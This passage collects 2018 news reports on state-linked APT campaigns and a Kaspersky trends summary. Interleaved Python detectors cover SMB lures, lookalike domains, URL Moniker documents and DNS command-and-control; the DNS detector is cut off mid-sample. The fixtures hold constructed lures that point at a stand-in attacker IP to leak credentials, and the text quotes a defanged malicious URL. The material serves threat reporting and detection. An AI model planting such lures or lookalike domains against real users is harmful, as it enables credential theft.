“One appears to mimic the domain of the International Republican Institute, which promotes democratic principles and is led by a notable board of directors, including six Republican senators and a leading senatorial candidate. Another is similar to the domain used by the Hudson Institute, which hosts prominent discussions on topics including cybersecurity, among other important activities. Other domains appear to reference the U.S. Senate but are not specific to particular offices.” reads the post published by Microsoft.
“To be clear, we currently have no evidence these domains were used in any successful attacks before the DCU transferred control of them, nor do we have evidence to indicate the identity of the ultimate targets of any planned attack involving these domains.”
Microsoft’s Digital Crimes Unit shut down the fake websites with a court approval received last year and notified targeted organizations.
At this time it is not possible to say whether the fake sites allowed the cyberspies to compromise visitors’ machines; Microsoft’s post doesn’t mention any sinkhole investigation conducted by its experts.
Microsoft has shut down dozens of other fake websites since 2016 after obtaining authorization from the authorities.
Experts believe that foreign states, especially Russia, will continue to attempt to hack into US politics; for this reason, Microsoft will continue to monitor any activity targeting US political groups and politicians.
“Despite last week’s steps, we are concerned by the continued activity targeting these and other sites and directed toward elected officials, politicians, political groups and think tanks across the political spectrum in the United States. Taken together, this pattern mirrors the type of activity we saw prior to the 2016 election in the United States and the 2017 election in France.” continues Microsoft.
In July, speaking at the Aspen Security Forum, Microsoft VP Tom Burt announced that the tech company uncovered and stopped attempts to launch spear-phishing attacks on three 2018 congressional candidates.

Microsoft blamed the Russian APT28 group for the attacks.

We “discovered that the [fake domains] were being registered by an activity group that at Microsoft we call Strontium…that’s known as Fancy Bear or APT 28,” Burt explained.

“The consensus of the threat intelligence community right now is [that] we do not see the same level of activity by the Russian activity groups leading into the mid-year elections that we could see when we look back at them at that 2016 elections.”

The discovery made by Microsoft is part of Microsoft’s Defending Democracy Program, launched in April, which is focused on four priorities: protecting campaigns from hacking, protecting voting and the electoral process, increasing political advertising transparency, and defending against disinformation campaigns.

Microsoft also announced its AccountGuard initiative, which provides the following services to organizational and personal email accounts:

Threat notification across accounts. The Microsoft Threat Intelligence Center will enable Microsoft to detect and provide notification of attacks in a unified way across both organizational and personal email systems. For political campaigns and other eligible organizations, when an attack is identified, this will provide a more comprehensive view of attacks against campaign staff. When verifiable threats are detected, Microsoft will provide personal and expedited recommendations to campaigns and campaign staff to secure their systems.
Security guidance and ongoing education. Officials, campaigns and related political organizations will receive guidance to help make their networks and email systems more secure. This can include applying multi-factor authentication, installing the latest security updates and guidance for setting up systems that ensure only those people who need data and documents can access them. AccountGuard will provide updated briefings and training to address evolving cyberattack trends.
Early adopter opportunities. Microsoft will provide preview releases of new security features on a par with the services offered to our large corporate and government account customers.

North Korea-linked Dark Hotel APT leverages CVE-2018-8373 exploit
20.8.2018 securityaffairs APT

The North Korea-linked Dark Hotel APT group is leveraging the recently patched CVE-2018-8373 vulnerability in the VBScript engine in attacks in the wild.
The vulnerability affects Internet Explorer 9, 10 and 11; it was first disclosed last month by Trend Micro and affects all supported versions of Windows.

The flaw could be exploited by remote attackers to take control of the vulnerable systems by tricking victims into viewing a specially crafted website through Internet Explorer. The attacker could also embed an ActiveX control marked ‘safe for initialization’ in an application or Microsoft Office document that hosts the IE rendering engine.

“A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.” reads the security advisory published by Microsoft.

“An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.”

The analysis of the exploit code for CVE-2018-8373 revealed that it shares the obfuscation technique used by another exploit, one triggering the CVE-2018-8174 flaw.

CVE-2018-8174 was first discovered by experts at the Chinese security company Qihoo 360 and was fixed by Microsoft in May.

The similarities between the exploits suggest that they were developed by the same threat actor.

“We found this exploit using heuristics, which led to a more in-depth analysis. Interestingly, we found that this exploit sample uses the same obfuscation technique as exploits for CVE-2018-8174, a VBScript engine remote code execution vulnerability patched back in May” wrote Trend Micro.

“We suspect that this exploit sample came from the same creator. Our analysis revealed that it used a new use-after-free (UAF) vulnerability in vbscript.dll, which remained unpatched in the latest VBScript engine.”


A similar theory was proposed by experts from Qihoo that collected evidence that linked the use of the CVE-2018-8373 exploit to Dark Hotel.

The experts discovered that the domain name embedded in the Office documents used in the latest attacks is the same one used to download the Double Kill exploit code in previous attacks linked to the North Korea-linked APT group.

“The 360 Threat Intelligence Center first obtained the IOC address after Trend Micro coding through the big data analysis association: Associated homologous 0day attack sample” states Qihoo

“And found an attack time and trend technology found in the wild “double kill” 0day attack on the same day suspected of using the 0day attack of the office document sample, the domain name embedded in the Offce document sample and the domain name format given by Trend Micro (http ://windows-updater[.]net/stack/ov[.]php?w= 1\x00who =1)”


In the analysis published in May by Qihoo 360, the researchers associated the CVE-2018-8373 exploit with Dark Hotel based on TTPs associated with the threat actor (e.g., the decryption algorithm used by the malware is identical to Dark Hotel’s).
Experts speculated that CVE-2018-8373 was used in a cyber espionage campaign aimed at China.

Alleged Iran-linked APT group RASPITE targets US electric utilities
3.8.2018 securityaffairs APT

According to Dragos firm, the RASPITE cyber-espionage group (aka Leafminer) has been targeting organizations in the United States, Europe, Middle East, and East Asia.
Researchers from industrial cybersecurity firm Dragos reported that a group operating out of Iran, tracked as RASPITE, has been targeting entities in the United States, Europe, the Middle East, and East Asia.

The group has been active since at least 2017; researchers uncovered operations aimed at government and other types of organizations in the Middle East.

“Dragos has identified a new activity group targeting access operations in the electric utility sector. We call this activity group RASPITE.” read a blog post published by Dragos.

“Analysis of RASPITE tactics, techniques, and procedures (TTPs) indicate the group has been active in some form since early- to mid-2017. RASPITE targeting includes entities in the US, Middle East, Europe, and East Asia. Operations against electric utility organizations appear limited to the US at this time.”

Last week, experts from Symantec, who track the group as Leafminer, published a detailed report on the activity of the cyber espionage team, which leveraged both custom-built malware and publicly available tools in the observed campaigns.

According to Symantec, the extent of the campaigns conducted by the group could be wider: the researchers uncovered a list, written in Farsi, of 809 targets whose systems were scanned by the attackers.

The list groups the organizations of interest by geography and industry; it includes targets in the United Arab Emirates, Qatar, Bahrain, Egypt, and Afghanistan.

Now researchers from Dragos have confirmed that RASPITE is behind attacks targeting industrial control systems in several states.

According to the experts, the hackers also accessed operations in the electric utility sector in the United States.

The hackers carry out watering hole attacks, leveraging compromised websites that provide content of interest to the potential victims.

RASPITE attacks appear similar to those conducted by other threat actors such as DYMALLOY and ALLANITE: the hackers inject into the compromised websites links to a resource that prompts an SMB connection, with the intent of gathering Windows credentials.

Then, the attackers deploy scripts to install malware that connects to a C&C server and gives the attacker control of the compromised machine.
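The watering-hole technique described above works because a browser fetches some page resources automatically, so a reference to a UNC path or file:// URL on a third-party host makes Windows attempt an outbound SMB authentication. As an added example (not Dragos’s or Symantec’s code), the following Python script scans a page for such references; the sample HTML and the documentation-range IP address are constructed for this example.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Tag/attribute pairs a browser fetches on its own when the page renders, so a
# UNC or file:// target there triggers an outbound SMB connection with no click.
AUTO_FETCH = {("img", "src"), ("script", "src"), ("link", "href"),
              ("iframe", "src"), ("source", "src"), ("video", "src"),
              ("audio", "src"), ("object", "data"), ("embed", "src")}


def smb_host(url):
    """Return the remote host a browser would contact over SMB for `url`,
    or None if the reference cannot cause an SMB connection."""
    u = url.strip()
    if u.startswith("\\\\"):                      # UNC path: \\host\share\file
        return u[2:].split("\\", 1)[0].split("/", 1)[0] or None
    parsed = urlparse(u)
    if parsed.scheme.lower() in ("file", "smb"):
        if parsed.netloc:                         # file://host/share/file
            return parsed.netloc
        if parsed.path.startswith("//"):          # file:////host/share/file
            return parsed.path[2:].split("/", 1)[0] or None
    return None


class SmbLureFinder(HTMLParser):
    """Collect every reference that would make a visitor's browser open an
    SMB connection to another host."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for attr, value in attrs:
            if value is None:
                continue
            host = smb_host(value)
            if host:
                self.findings.append({
                    "tag": tag, "attr": attr, "host": host,
                    # auto-fetched references fire without user interaction
                    "auto_fetch": (tag, attr) in AUTO_FETCH,
                })


def find_smb_lures(html):
    """Parse `html` and return the list of SMB-triggering references."""
    parser = SmbLureFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed page: a normal site with injected references pointing at a
# documentation-range IP that stands in for an attacker-controlled host.
SAMPLE_PAGE = r"""<html><body>
<img src="/images/logo.png" alt="logo">
<a href="https://example.org/news">News</a>
<img src="\\203.0.113.7\share\pixel.png" width="1" height="1">
<link rel="stylesheet" href="file:////203.0.113.7/share/style.css">
<a href="file://203.0.113.7/docs/report.docx">Quarterly report</a>
</body></html>"""


if __name__ == "__main__":
    for finding in find_smb_lures(SAMPLE_PAGE):
        print(finding)
```

The same check can be run over stored copies of a site’s pages; independently of any lure, blocking outbound TCP 445 and 139 at the network edge removes the credential-leak path.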

RASPITE attacks

According to Dragos, although RASPITE has mainly focused on ICS-operating entities, there is currently no evidence of destructive attacks on such devices.

“RASPITE’s activity to date currently focuses on initial access operations within the electric utility sector. Although focused on ICS-operating entities, RASPITE has not demonstrated an ICS-specific capability to date.” continues Dragos.

“This means that the activity group is targeting electric utilities, but there is no current indication the group has the capability of destructive ICS attacks including widespread blackouts like those in Ukraine.”

Sergio Caltagirone, Director of Threat Intelligence, Dragos, explained that his firm provided only limited information on the activity of the group to avoid “proliferation of ideas or tradecraft to other activity groups.”

Russian APT28 espionage group targets democratic Senator Claire McCaskill
28.7.2018 securityaffairs APT

The Russia-linked APT28 group targets Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.
The Russian APT group tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit, and STRONTIUM), which operates under the Russian military agency GRU, continues to target US politicians.

This time the target is Senator Claire McCaskill and her staff as they gear up for her 2018 re-election campaign.

The news was reported by The Daily Beast. McCaskill has always been critical of Russia and its aggressive strategy in cyberspace: she has repeatedly accused the Russian Government of “cyber warfare against our democracy,” and has called President Vladimir Putin a “thug” and a “bully.”

Russian cyberspies launched spear-phishing attacks against members of her staff aimed at stealing their credentials, a tactic already used against Hillary Clinton’s campaign manager John Podesta in 2016.

The phishing messages contained fake notifications instructing the victims to change their Microsoft Exchange passwords.

“The attempt against McCaskill’s office was a variant of the password-stealing technique used by Russia’s so-called “Fancy Bear” hackers against Clinton’s campaign chairman, John Podesta, in 2016.” reads the report published by The Daily Beast.

“The hackers sent forged notification emails to Senate targets claiming the target’s Microsoft Exchange password had expired, and instructing them to change it. If the target clicked on the link, he or she was taken to a convincing replica of the U.S. Senate’s Active Directory Federation Services (ADFS) login page, a single sign-on point for e-mail and other services.”

democratic Senator Claire McCaskill

In July, Microsoft helped the US Government in protecting at least three 2018 midterm election candidates from attacks by Russian cyberspies.

The hackers sent spear-phishing messages to the candidates; the messages included links to a fake Microsoft website used by the cyberspies to trick victims into providing their credentials.

“Earlier this year, we did discover that a fake Microsoft domain had been established as the landing page for phishing attacks,” said Tom Burt, Microsoft’s vice president for customer security.

“And we saw metadata that suggested those phishing attacks were being directed at three candidates who are all standing for election in the midterm elections.”

Once Microsoft discovered the phishing website, it took it down and helped the US government to “avoid anybody being infected by that particular attack.”

“In October, Microsoft wrested control of one of the spoofed website addresses—adfs.senate.qov.info. Seizing the Russians’ malicious domain names has been easy for Microsoft since August 2017, when a federal judge in Virginia issued a permanent injunction against the GRU hackers, after Microsoft successfully sued them as unnamed “John Doe” defendants.” continues the report.

Microsoft sinkholed the website; in this way it was able to track the victims who were being redirected to the phishing page.
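The fake Senate and think-tank domains in the Microsoft article above and the spoofed adfs.senate.qov.info address quoted here rely on the same lookalike tricks: a glyph swapped for a confusable one (q for g) and the genuine brand placed in the subdomain labels of an unrelated registrable domain. As an added example (not Microsoft’s or The Daily Beast’s code), the following Python function flags candidate domains against a short protected list; the protected list, the confusables table and the two-label registrable-domain simplification are assumptions made for this example.

```python
# Protected domains for this example: senate.gov and microsoft.com are the
# brands the articles name; the third is a constructed placeholder.
PROTECTED = ["senate.gov", "microsoft.com", "example-thinktank.org"]

# Glyph pairs that read alike in an address bar (a small, constructed table;
# production tooling would use a fuller confusables list).
_MULTI_CHAR = (("rn", "m"), ("vv", "w"))
_SINGLE_CHAR = {"q": "g", "0": "o", "1": "l", "i": "l"}


def normalize(label):
    """Map a DNS label to a canonical form in which confusable glyphs collide."""
    s = label.lower()
    for seq, repl in _MULTI_CHAR:
        s = s.replace(seq, repl)
    return "".join(_SINGLE_CHAR.get(c, c) for c in s)


def labels(fqdn):
    """Split a host name into its non-empty labels, lower-cased."""
    return [part for part in fqdn.lower().strip(".").split(".") if part]


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1,
                           prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def assess(candidate, protected=PROTECTED):
    """Return (protected_domain, reason) if `candidate` looks like an
    impersonation of a protected domain, or None if it is the genuine domain
    (or a real subdomain of it) or unrelated.

    Assumption: the registrable part is the last two labels; real code would
    consult the public suffix list."""
    cand = labels(candidate)
    cand_norm = [normalize(x) for x in cand]
    for prot in protected:
        p = labels(prot)
        if cand[-len(p):] == p:
            return None                     # genuine: ends with the real domain
    for prot in protected:
        p = labels(prot)
        p_norm = [normalize(x) for x in p]
        # 1. the registrable part is a glyph-for-glyph twin (rnicrosoft.com)
        if cand_norm[-len(p):] == p_norm:
            return (prot, "homoglyph twin of the registrable domain")
        # 2. the brand (or its twin) sits in the subdomain labels of another
        #    registrable domain, as in adfs.senate.qov.info
        for i in range(len(cand_norm) - len(p_norm)):
            if cand_norm[i:i + len(p_norm)] == p_norm:
                return (prot, "protected domain embedded as subdomain labels")
        # 3. same TLD, second-level label one typo away (senete.gov)
        if len(cand) >= 2 and cand[-1] == p[-1] and \
                edit_distance(cand[-2], p[-2]) == 1:
            return (prot, "one edit away from the second-level label")
    return None


if __name__ == "__main__":
    for host in ("adfs.senate.qov.info", "www.senate.gov",
                 "rnicrosoft.com", "senete.gov", "example.org"):
        print(host, "->", assess(host))
```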

The Daily Beast identified McCaskill as a target while investigating statements made by Microsoft VP Tom Burt during his speech at the Aspen Security Forum.

Microsoft attributed the attacks to the Russian APT28 group.

McCaskill released a statement confirming that the cyberattack was unsuccessful.

“Russia continues to engage in cyber warfare against our democracy. I will continue to speak out and press to hold them accountable,” McCaskill said.

“While this attack was not successful, it is outrageous that they think they can get away with this. I will not be intimidated. I’ve said it before and I will say it again, Putin is a thug and a bully.”

DHS – Russian APT groups are inside US critical infrastructure
24.7.2018 securityaffairs APT

The US Government is warning of continuous intrusions in National critical infrastructure and it is blaming the Kremlin for the cyber attacks.
According to the US Department of Homeland Security, Russia’s APT groups have already penetrated America’s critical infrastructure, especially power utilities, and are still targeting them.
These attacks could have dramatic consequences: an attack against a power grid could cause a massive power outage.

This is not science fiction; it has already happened in Ukraine, and security experts blamed the Russian APT groups tracked as Dragonfly and Energetic Bear.

According to the government experts, the hackers were able to penetrate even air-gapped networks.

The Wall Street Journal quoted Homeland Security officials reporting various attacks.

“Hackers working for Russia claimed “hundreds of victims” last year in a long-running campaign that put them inside the control rooms of U.S. electric utilities where they could have caused blackouts, federal officials said.” states the WSJ.

The officials maintain that the Energetic Bear APT has already penetrated “hundreds” of systems in national power grids.

The DHS issued several alerts related to the APT attacks and shared technical details about their TTPs, including Indicators of Compromise (IOCs) to detect their presence in the IT infrastructure.

Cyber intrusions into critical infrastructure are part of a long-term information warfare strategy.

Russian APT groups carried out spear-phishing attacks against the utilities’ equipment vendors and subcontractors to gather intelligence and collect the information needed to penetrate the infrastructure.

The hackers aim to exploit the access into the utilities that equipment makers and suppliers use for ordinary maintenance and telemetry; this access could allow them to deploy malware into the facilities.

Unfortunately, the attacks are still ongoing, and many critical infrastructure facilities are operated by private companies with poor cyber hygiene.

Unfortunately, in many cases the operators are totally unaware of the attackers’ presence in their networks.

“They got to the point where they could have thrown switches,” Jonathan Homer, chief of industrial control system analysis for Homeland Security, told the paper.

CSE Malware ZLab – Chinese APT27 ’s long-term espionage campaign in Syria is still ongoing
23.7.2018 securityaffairs APT

Researchers at CSE Cybsec ZLab analyzed a malicious code involved in a long-term espionage campaign in Syria attributed to Chinese APT27 group.
A few days ago, the security researcher Lukas Stefanko from ESET discovered an open repository containing some Android applications.

APT27 syria

The folder was found on a compromised website at the following URL:


This website is written in Arabic and, judging by a translation of its content, it seems to offer a secure messaging app. The homepage shows how the application works and includes some slides about it.

Security researchers from CSE Cybsec Z-Lab analyzed the content of the folder and discovered an Android spyware that was developed to exfiltrate sensitive information from victims’ devices.

The malicious code was used to compromise entities in the area; the researchers discovered that it was part of the arsenal of a Chinese APT group tracked as APT27, aka Golden Rat Organization.

The APT27 group has focused its activity on Syria in the last couple of years, using both Windows and Android malware to compromise target devices. Its code is not very sophisticated; nevertheless, the group’s activity is still ongoing.

Searching online, we found only one team of researchers that has tracked the activity of the APT27 group in Syria since 2016: the 360 Threat Intelligence Center.

The analysis published by that team documented the activity of APT27 in Syria; the code analyzed by the malware analysts at ZLab at CSE Cybsec and the one dissected by the 360 Threat Intelligence Center are nearly identical.

The 360 Threat Intelligence Center analysis is dated 2017; the experts at CSE Cybsec collected evidence that the cyber espionage campaign is still ongoing and that the threat actor continues to improve its malicious code.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by the researchers at ZLab.

Update CSE Malware ZLab – Operation Roman Holiday – Hunting the Russian APT28
19.7.2018 securityaffairs APT

Researchers from the Z-Lab at CSE Cybsec analyzed a new collection of malware allegedly part of a new espionage campaign conducted by the APT28 group.
It was a long weekend for the researchers from the Z-Lab at CSE Cybsec, who completed the analysis of a number of payloads that are part of a new cyber espionage campaign conducted by the Russian APT28 group (aka Fancy Bear, Pawn Storm, Sednit, Sofacy, and Strontium).

The last time experts attributed an ongoing campaign to APT28 was in June, when experts from Palo Alto Networks noticed that the group was using new tools in a recent string of attacks.

Palo Alto Networks explained that the APT group has shifted its focus from NATO member countries and Ukraine towards the Middle East and Central Asia.

The researchers observed several attacks leveraging the SPLM and the Zebrocy tool between the second and fourth quarters of 2017 against organizations in Asia. The list of targeted countries included China, Mongolia, South Korea and Malaysia.

While conducting ordinary threat intelligence activities, experts at Z-Lab at CSE Cybsec have recently discovered a new series of malware samples that were submitted to the major online sandboxes.

In particular, they noticed a malware sample submitted to VirusTotal that was attributed by some experts to the Russian APT28 group.

The APT28 group has been active since at least 2007 and has targeted governments, militaries, and security organizations worldwide. The group was also involved in the string of attacks that targeted the 2016 US Presidential election.

With the help of the researcher that goes online with the Twitter handle Drunk Binary (@DrunkBinary) researchers from Z-Lab obtained a collection of samples to compare with the one that was uploaded on VirusTotal platform.

The analysis revealed that it was a new variant of the infamous APT28 backdoor tracked as X-Agent, in particular a new Windows version that appeared in the wild in June.

The attack analyzed by CSE Cybsec is multi-stage: the experts discovered an initial dropper written in the Delphi programming language (a language used by the APT28 group in other campaigns) that downloads a second-stage payload from the Internet and executes it.

The payload communicates with its server over HTTPS, which hides the content of the malicious traffic from passive network monitoring; it can still be inspected where TLS is intercepted at a proxy or hooked on the endpoint, and the C2 domain remains visible in DNS queries and in the TLS handshake.

The experts also analyzed another malicious DLL, apparently unrelated to the previous samples, that presents many similarities with other payloads attributed to the Russian APT group.

This malware immediately caught the attention of the experts because it contacts a C2 with the name “marina-info.net”, a clear reference to the Italian Navy, the Marina Militare. This led them to believe that the malicious code was developed as part of targeted attacks against the Italian Marina Militare or some other entity associated with it.

This last DLL seems to be completely unconnected with the previous samples, but further investigation leads the experts into believing that it was an additional component used by APT28 in this campaign to compromise the target system.

APT28 has a rich arsenal composed of a large number of modular malware, and Z-Lab assesses the DLL to be one such component alongside the X-Agent sample it dissected.

X-Agent is a persistent payload injected into the victim machine that can be compiled for almost any operating system and can be extended with new ad-hoc components developed for a specific attack.

In this case, the component was submitted to online sandboxes while the new campaign was ongoing. The experts cannot exclude that the APT group developed the backdoor to target specific organizations including the Italian Marina Militare or any other subcontractor. In their analysis, the experts were not able to directly connect the malicious dll file to the X-Agent samples, but they believe they are both parts of a well-coordinated surgical attack powered by APT28 tracked by Z-Lab as Roman Holiday because it targeted Italian organizations in the summertime.

The DLL that connects to “marina-info.net” might be the last-stage malware, triggered only when particular conditions occur, for example when the malware infects a system whose IP address belongs to specific ranges.

Further details on the malware samples analyzed by CSE Cybsec, including the IoCs and Yara rules, are available in the report published by the researchers at ZLab.

APT Trends Report Q2 2018
19.7.2018 Kaspersky   APT
In the second quarter of 2017, Kaspersky Lab’s Global Research and Analysis Team (GReAT) began publishing summaries of the quarter’s private threat intelligence reports, in an effort to make the public aware of the research we have been conducting. This report serves as the latest installment, focusing on the relevant activities that we observed during Q2 2018.

These summaries are a representative snapshot of what has been discussed in greater detail in our private reports. They aim to highlight the significant events and findings that we feel people should be aware of. For brevity’s sake, we are choosing not to publish indicators associated with the reports highlighted. However, readers who would like to learn more about our intelligence reports or request more information on a specific report are encouraged to contact: intelreports@kaspersky.com.

Remarkable new findings
We are always interested in analyzing new techniques used by existing groups, or in finding new clusters of activity that might lead us to discover new actors. Q2 2018 was very interesting in terms of APT activity, with a remarkable campaign that reminds us how real some of the threats are that we have been predicting over the last few years. In particular, we have warned repeatedly how ideal networking hardware was for targeted attacks, and that we had started seeing the first advanced sets of activity focusing on these devices.

In terms of well-known groups, Asian actors were the most active by far.

Lazarus/BlueNoroff was suspected of targeting financial institutions in Turkey as part of a bigger cyberespionage campaign. The same actor was also suspected of a campaign against an online casino in Latin America that ended in a destructive attack. Based on our telemetry, we further observed Lazarus targeting financial institutions in Asia. Lazarus has accumulated a large collection of artefacts over the last few years, in some cases with heavy code reuse, which makes it possible to link many newly found sets of activity to this actor. One such tool is the Manuscrypt malware, used exclusively by Lazarus in many recent attacks. The US-CERT released a warning in June about a new version of Manuscrypt they call TYPEFRAME.

Even if it is unclear what the role of Lazarus will be in the new geopolitical landscape, where North Korea is actively engaged in peace talks, it would appear that financially motivated activity (through the BlueNoroff and, in some cases, the Andariel subgroup) continues unabated.

Possibly even more interesting is the relatively intense activity by Scarcruft, also known as Group123 and Reaper. Back in January, Scarcruft was found using a zero-day exploit, CVE-2018-4878 to target South Korea, a sign that the group’s capabilities were increasing. In the last few months, the use of Android malware by this actor has been discovered, as well as a new campaign where it spreads a new backdoor we call POORWEB. Initially, there was suspicion that Scarcruft was also behind the CVE-2018-8174 zero day announced by Qihoo360. We were later able to confirm the zero day was actually distributed by a different APT group, known as DarkHotel.

The overlaps between Scarcruft and Darkhotel go back to 2016 when we discovered Operation Daybreak and Operation Erebus. In both cases, attacks leveraged the same hacked website to distribute exploits, one of which was a zero day. We were later able to separate these as follows:

Operation Exploit Actor
Daybreak CVE-2016-4171 DarkHotel
Erebus CVE-2016-4117 Scarcruft
DarkHotel’s Operation Daybreak relied on spear-phishing emails predominantly targeting Chinese victims with a Flash Player zero day. Meanwhile, Scarcruft’s Operation Erebus focused primarily on South Korea.

Analysis of the CVE-2018-8174 exploit used by DarkHotel revealed that the attacker was using a URL Moniker to invoke Internet Explorer through Microsoft Word, ignoring any default browser preference on the victim’s computer. This is the first time we have observed this. It is an interesting technique that we believe may be reused in future for different attacks. For more details check our Securelist Blog: “The King is Dead. Long Live the King!“.
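A URL Moniker embedding leaves a fixed marker in the carrier document: the moniker’s CLSID, {79EAC9E0-BAF9-11CE-8C82-00AA004BA90B}, which is a Windows constant (the same object type is behind CVE-2017-0199 lures). The scanner below is an added example, not code from the Kaspersky report or from any vendor tool. It looks for that CLSID in the three forms it takes on disk: the raw little-endian GUID inside OLE streams, the hex-encoded form in RTF `\objdata`, and the textual GUID in OOXML parts. The RTF and DOCX samples it builds are constructed here for illustration, contain no exploit, and their exact layout is an assumption.

```python
import io
import re
import uuid
import zipfile

# Windows constant: CLSID of the standard URL Moniker (CLSID_StdURLMoniker).
URL_MONIKER_CLSID = uuid.UUID("79EAC9E0-BAF9-11CE-8C82-00AA004BA90B")

# On-disk forms: raw little-endian GUID (OLE streams such as word/embeddings/*.bin),
# that GUID hex-encoded (RTF \objdata), and the textual GUID (OOXML / XML parts).
_BIN = URL_MONIKER_CLSID.bytes_le
_HEX = re.compile(re.escape(_BIN.hex()).encode(), re.I)
_TXT = re.compile(re.escape(str(URL_MONIKER_CLSID)).encode(), re.I)


def scan_blob(name, data):
    """Return findings for one byte blob (a whole file or one zip member)."""
    hits = []
    if _BIN in data:
        hits.append(f"{name}: binary URL Moniker CLSID")
    # RTF writers wrap \objdata hex across lines; collapse whitespace before matching.
    compact = re.sub(rb"\s+", b"", data)
    if _HEX.search(compact):
        hits.append(f"{name}: hex-encoded URL Moniker CLSID (RTF objdata)")
    if _TXT.search(data):
        hits.append(f"{name}: textual URL Moniker CLSID")
    return hits


def scan_document(data):
    """Scan a document given as bytes; OOXML (zip) containers are walked member by member."""
    if data[:2] == b"PK":
        hits = []
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            for member in z.namelist():
                hits.extend(scan_blob(member, z.read(member)))
        return hits
    return scan_blob("<file>", data)


# --- constructed samples (illustrative layout, not real malware) -------------
def build_sample_rtf():
    hexdata = _BIN.hex().encode()
    body = hexdata[:10] + b"\r\n" + hexdata[10:]          # hex split over a line break
    return b"{\\rtf1{\\object\\objautlink{\\*\\objdata 0105000002000000" + body + b"}}}"


def build_sample_docx():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/embeddings/oleObject1.bin", b"\x00" * 64 + _BIN + b"\x00" * 64)
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("rtf", build_sample_rtf()), ("docx", build_sample_docx())):
        print(label, scan_document(doc) or "clean")
```

Presence of the CLSID is a strong triage signal rather than proof of malice: legitimate documents can embed linked objects, so a hit should be followed by extracting the object’s target URL and checking what it fetches. Heavily obfuscated RTF (control words interleaved inside the hex) will evade this simple whitespace collapse and needs a proper RTF tokenizer.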

We also observed some relatively quiet groups coming back with new activity. A noteworthy example is LuckyMouse (also known as APT27 and Emissary Panda), which abused ISPs in Asia for waterhole attacks on high profile websites. We wrote about LuckyMouse targeting national data centers in June. We also discovered that LuckyMouse unleashed a new wave of activity targeting Asian governmental organizations just around the time they had gathered for a summit in China.

Still, the most notable activity during this quarter is the VPNFilter campaign attributed by the FBI to the Sofacy and Sandworm (Black Energy) APT groups. The campaign targeted a large array of domestic networking hardware and storage solutions. It is even able to inject malware into traffic in order to infect computers behind the infected networking device. We have provided an analysis on the EXIF to C2 mechanism used by this malware.

This campaign is one of the most relevant examples we have seen of how networking hardware has become a priority for sophisticated attackers. The data provided by our colleagues at Cisco Talos indicates this campaign was at a truly global level. We can confirm with our own analysis that traces of this campaign can be found in almost every country.

Activity of well-known groups
It seems that some of the most active groups from the last few years have reduced their activity, although this does not mean they are less dangerous. For instance, it was publicly reported that Sofacy started using new, freely available modules as last stagers for some victims. However, we observed how this provided yet another innovation for their arsenal, with the addition of new downloaders written in the Go programming language to distribute Zebrocy.

There is possibly one notable exception to this supposed lack of activity. After the Olympic Destroyer campaign last January against the Pyeongchang Winter Olympic games, we observed new suspected activity by the same actor (we tentatively called them Hades) in Europe. This time, it seems the targets are financial organizations in Russia, and biological and chemical threat prevention laboratories in Europe and Ukraine.

But even more interesting is the resemblance between the TTPs and OPSEC of the Olympic Destroyer set of activity and those of Sofacy. Olympic Destroyer is a master of deception, so this may be yet another false flag, but so far we connect, with low to medium confidence, the Hades group activity to Sofacy.

One of the most interesting attacks we detected was an implant from Turla (attributed to this actor with medium confidence) that we call LightNeuron. This new artefact directly targets Exchange Servers and uses legitimate standard calls to intercept emails, exfiltrate data and even send mails on behalf of the victims. We believe this actor has been using this technique since maybe as early as 2014, and that there is a version affecting Unix servers running Postfix and Sendmail. So far we have seen victims of this implant in the Middle East and Central Asia.

Newcomers and comebacks
Every now and then, we are surprised to see old actors that have been dormant for months or even years distributing new malware. Obviously, this may be caused by a lack of visibility, but regardless of that, it indicates that these actors are still active.

One good example would be WhiteWhale, an actor that has been extremely quiet since 2016. We detected a new campaign last April where the actor was distributing both the Taidoor and Yalink malware families. This activity was almost exclusively targeting Japanese entities.

Following the intense diplomatic activity around the North Korea peace talks and the subsequent summit with the U.S. president in Singapore, Kimsuky decided to take advantage of this theme to distribute its malware in a new campaign. A massive update to its arsenal in late 2017 and early 2018 was mobilized in a new wave of spear-phishing emails.

We also discovered a new low-sophistication set of activity we call Perfanly, which we couldn’t attribute to any known actor. It has been targeting governmental entities in Malaysia and Indonesia since at least 2017. It uses custom multistage droppers as well as freely available tools such as Metasploit.

Between June and July, we observed a battery of attacks against various institutions in Kuwait. These attacks leverage Microsoft Office documents with macros, which drop a combination of VBS and Powershell scripts using DNS for command and control. We have observed similar activity in the past from groups such as Oilrig and Stonedrill, which leads us to believe the new attacks could be connected, though for now that connection is only assessed as low confidence.
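DNS-based command and control of the kind described above tends to stand out in resolver logs even when the payload scripts themselves are not caught: every query carries a fresh, encoded subdomain, the record types used are the ones that can carry free-form data, and the names are long. The following detector is an added example, not Kaspersky’s code; it profiles a small DNS query log constructed here (dnsmasq-style `timestamp client qtype qname` lines) and flags domains that match at least two of those indicators. The thresholds and the “last two labels” approximation of the registered domain are assumptions for illustration; a deployment would baseline them per environment and use a public-suffix list.

```python
import math
import re
from collections import defaultdict

# Constructed DNS query log (not real victim traffic): timestamp client qtype qname
SAMPLE_LOG = """\
2018-06-12T09:00:01 10.0.5.17 A www.example.com
2018-06-12T09:00:03 10.0.5.17 A mail.example.com
2018-06-12T09:00:05 10.0.5.17 TXT 7a3f19c2e8d4.d8a1f7e6b0c3.updates.example.net
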